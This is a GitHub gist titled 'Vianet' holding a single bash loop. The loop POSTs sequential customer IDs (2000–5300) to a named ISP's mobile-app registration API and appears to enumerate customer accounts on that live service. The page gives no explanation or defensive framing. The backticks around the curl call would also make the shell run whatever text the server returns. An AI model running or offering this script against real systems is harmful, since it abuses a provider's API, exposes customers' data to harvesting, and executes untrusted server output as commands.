Skip to content

Instantly share code, notes, and snippets.

@himalay
Last active August 22, 2018 13:47
Show Gist options
  • Save himalay/95d3604af2d2fa4c1bc70a82b94ae3e5 to your computer and use it in GitHub Desktop.
Save himalay/95d3604af2d2fa4c1bc70a82b94ae3e5 to your computer and use it in GitHub Desktop.
Vianet
for i in {2000..5300}; do `curl -X POST -d "customer_id=$i" http://appapi.vianet.com.np/customerapi/mobileapp/registration/VIA-API-KEY/neptouch/format/json`; done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment